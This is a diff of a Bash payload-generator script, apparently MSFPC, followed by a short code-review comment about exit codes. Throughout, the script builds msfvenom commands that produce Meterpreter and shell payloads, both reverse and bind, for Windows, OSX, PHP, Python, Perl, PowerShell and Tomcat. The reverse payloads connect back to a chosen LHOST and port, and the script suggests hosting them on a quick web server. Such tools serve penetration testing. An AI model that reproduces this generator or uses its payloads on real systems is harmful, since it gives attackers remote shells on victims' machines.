"${STAGE}" == "staged" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} OSX. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 elif [[ "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do METERPRETER OSX. There ${RED}isn't a OSX Meterpreter${RESET}...yet." >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} OSX. There ${RED}isn't a OSX Meterpreter${RESET}...yet." 
>&2 fi TYPE="osx" FILEEXT="macho" - PAYLOAD="osx/x86/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="osx/x86/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Perl elif [[ "${TYPE}" == "perl" || "${TYPE}" == "pl" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="shell" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # meterpreter or stageless - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="shell" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Can't do: meterpreter or stageless - Invalid Payload Selected if [[ "${STAGE}" == "stageless" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGLESSS PERL. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} Perl. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 elif [[ "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do METERPRETER PERL. There ${RED}isn't a PERL Meterpreter${RESET}...yet." >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} PERL. There ${RED}isn't a Perl Meterpreter${RESET}...yet." 
>&2 fi TYPE="linux" FILEEXT="pl" - PAYLOAD="cmd/unix${_STAGE}reverse_perl" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform unix -a cmd -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="cmd/unix${_STAGE}${DIRECTION}_perl" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform unix -a cmd -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## PHP elif [[ "${TYPE}" == "php" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="stageless" && _STAGE="_" - # shell - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Can't do: shell - Invalid Payload Selected if [[ "${SHELL}" == "shell" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do SHELL PHP. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} PHP. There ${RED}isn't a option in Metasploit to allow it${RESET}. 
=(" >&2 fi TYPE="php" FILEEXT="php" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Powershell elif [[ "${TYPE}" == "powershell" || "${TYPE}" == "ps1" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="stageless" && _STAGE="_" + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="stageless" && _STAGE="_" + [[ "${METHOD}" == "find_port" ]] && METHOD="allports" TYPE="windows" FILEEXT="ps1" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ps1 --platform ${TYPE} -e generic/none -a x86 LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ps1 --platform ${TYPE} -e generic/none -a x86 LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Python elif [[ "${TYPE}" == "python" || "${TYPE}" == "py" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="staged" && 
_STAGE="/" - # staged shell // stageless meterpreter - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Cant do: staged shell // stageless meterpreter // stageless bind - Invalid Payload Selected if [[ "${STAGE}" == "staged" && "${SHELL}" == "shell" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGED SHELL Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 elif [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGEless METERPRETER Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 + elif [[ "${STAGE}" == "stageless" && "${DIRECTION}" == "bind" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${DIRECTION} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. 
=(" >&2 fi TYPE="python" FILEEXT="py" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Tomcat elif [[ "${TYPE}" == "tomcat" || "${TYPE}" == "war" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # stageless meterpreter - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Cant do: stageless meterpreter // stageless bind // find_ports (Invalid Payload Selected) if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGELESS METERPRETER TOMCAT. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 + elif [[ "${STAGE}" == "stageless" && "${DIRECTION}" == "bind" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to do ${DIRECTION} ${STAGE} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 + elif [[ "${METHOD}" == "find_ports" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to do ${METHOD} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. 
=(" >&2 fi TYPE="tomcat" FILEEXT="war" - PAYLOAD="java/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f raw --platform java -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="java/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform java -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Windows elif [[ "${TYPE}" == "windows" || "${TYPE}" == "win" || "${TYPE}" == "exe" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="stageless" && _STAGE="_" + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + [[ "${METHOD}" == "find_port" ]] && METHOD="allports" + # Its able todo anything that you throw at it =). 
TYPE="windows" FILEEXT="exe" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" + +# Batch/Loop modes +elif [[ "${BATCH}" == "true" || "${LOOP}" == "true" ]]; then + #SUCCESS=true + exit 0 +# Blank input elif [[ -z "${TYPE}" ]]; then - #echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}" - true + echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}" + +# Unexected input else echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}" >&2 fi 
@@ -549,51 +730,11 @@ fi ##### Done! -if [[ "$SUCCESS" == true ]]; then +if [[ "${SUCCESS}" == true ]]; then echo -e " ${GREEN}[?]${RESET} Quick ${GREEN}web server${RESET} for file transfer? python -m SimpleHTTPServer 8080" echo -e " ${BLUE}[*]${RESET} ${BLUE}Done${RESET}!" - exit 0 else - echo -e "\n ${YELLOW}[i]${RESET} ${BLUE}${0}${RESET} () () () () () ()" - echo -e " ${YELLOW}[i]${RESET} Example: ${0} windows 192.168.1.10 # Windows & manual IP." - echo -e " ${YELLOW}[i]${RESET} ${0} elf eth0 4444 # Linux, eth0's IP & manual port." - echo -e " ${YELLOW}[i]${RESET} ${0} stageless cmd py verbose # Python, stageless command prompt." - echo -e " ${YELLOW}[i]${RESET} ${0} loop eth1 # A payload for every type, using eth1's IP." - echo -e " ${YELLOW}[i]${RESET} ${0} msf batch eth1 # All possible Meterpreter payloads, using eth1's IP." - echo "" - echo -e " ${YELLOW}[i]${RESET} : (All ${YELLOW}reverse TCP${RESET} payloads)" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}ASP${RESET}" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}ASPX${RESET}" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Bash${RESET} [.${YELLOW}sh${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Java${RESET} [.${YELLOW}jsp${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Linux${RESET} [.${YELLOW}elf${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}OSX${RESET} [.${YELLOW}macho${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Perl${RESET} [.${YELLOW}pl${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}PHP${RESET}" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Powershell${RESET} [.${YELLOW}ps1${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Python${RESET} [.${YELLOW}py${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Tomcat${RESET} [.${YELLOW}war${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Windows${RESET} [.${YELLOW}exe${RESET}]" - echo "" - echo -e " ${YELLOW}[i]${RESET} Rather than putting , you can do a ${YELLOW}interface${RESET} and MPC will detect that IP address." 
- echo -e " ${YELLOW}[i]${RESET} Missing will default to the ${YELLOW}IP menu${RESET}." - echo "" - echo -e " ${YELLOW}[i]${RESET} Missing will default to ${YELLOW}443${RESET}." - echo "" - echo -e " ${YELLOW}[i]${RESET} splits the payload into parts, making it ${YELLOW}smaller but dependant on Metasploit${RESET}." - echo -e " ${YELLOW}[i]${RESET} is the complete ${YELLOW}standalone payload${RESET}. More 'stabe' than ." - echo -e " ${YELLOW}[i]${RESET} Missing will default to ${YELLOW}${RESET}." - echo -e " ${YELLOW}[i]${RESET} Note: Metasploit doesn't (yet!) support for every format." - echo "" - echo -e " ${YELLOW}[i]${RESET} is a standard/${YELLOW}native command prompt${RESET}/terminal to interactive with." - echo -e " ${YELLOW}[i]${RESET} is a custom ${YELLOW}cross platform Meterpreter${RESET} shell, gaining the full power of Metasploit." - echo -e " ${YELLOW}[i]${RESET} Note: Metasploit doesn't (yet!) support / for every format." - echo -e " ${YELLOW}[i]${RESET} Missing will default to ${YELLOW}Meterpreter${RESET}." - [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} payloads are generally much ${YELLOW}smaller${RESET} than and easier to bypass EMET." - echo "" - echo -e " ${YELLOW}[i]${RESET} will generate ${YELLOW}as many combinations as possible${RESET}: , & ." - echo -e " ${YELLOW}[i]${RESET} will just create ${YELLOW}one of each${RESET} ." - echo "" - echo -e " ${YELLOW}[i]${RESET} will display ${YELLOW}more information${RESET} during the process." - exit 1 + doHelp fi + +exit 0
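Review bot: The unconditional `exit 0` added after the `if/else` makes the failure path (`doHelp`) return success as well, whereas the removed block ended with `exit 1`; anything that scripts MPC, which the commit message names as a goal, can no longer tell a generated payload from a usage error by exit code. Keep `exit 0` in the success branch and follow `doHelp` with `exit 1`, e.g. `else doHelp; exit 1; fi`. Minor: the hint `python -m SimpleHTTPServer 8080` serves the current working directory, which is the payload directory only when `OUTPATH` is the cwd; printing the output path alongside the hint (or a `cd` into it) would avoid serving the wrong folder.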